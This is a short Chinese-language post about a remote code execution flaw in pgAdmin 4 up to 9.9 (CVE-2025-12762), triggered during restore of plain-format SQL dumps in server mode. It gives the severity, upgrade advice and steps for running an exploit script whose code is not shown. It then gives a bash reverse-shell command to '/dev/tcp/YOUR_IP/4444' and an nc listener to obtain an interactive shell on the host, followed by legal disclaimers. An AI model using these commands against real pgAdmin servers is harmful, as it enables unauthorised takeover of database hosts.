
pgAdmin 4 版本 ≤ 9.9 中存在一个远程代码执行(RCE)漏洞。 当 pgAdmin 以服务器模式运行并在还原过程中处理 PLAIN 格式的 SQL 转储时,攻击者可以在主机上执行任意命令。
🟥 9.1 / 10 — 严重
⬆️ 升级到 pgAdmin 4 v10.0 或更高版本
pgAdmin 通常用于管理关键 PostgreSQL 数据库,这意味着:
# 1. 保存为 CVE-2025-12762.py
# 2. 安装依赖
pip3 install requests
# 3. 运行
python3 CVE-2025-12762.py
运行后,检查:
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
文件存在 → 你就真正利用了 CVE-2025-12762。
将 COMMAND 行替换为:
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
然后运行 nc -lvnp 4444 → 获得完整的交互式 shell。
这就是研究人员、渗透测试人员和红队成员在 2025 年 11 月于全球范围内使用的确切脚本。
请负责任地使用。修补一切。保持合法。
此 PoC 仅供授权测试和教育用途。
你只能在你拥有或已获得明确书面许可测试的系统上运行它。
任何未经授权的使用都是非法的,并违反计算机滥用相关法律。
请负责任地使用,测试后立即修补,切勿在未获许可的情况下针对任何系统。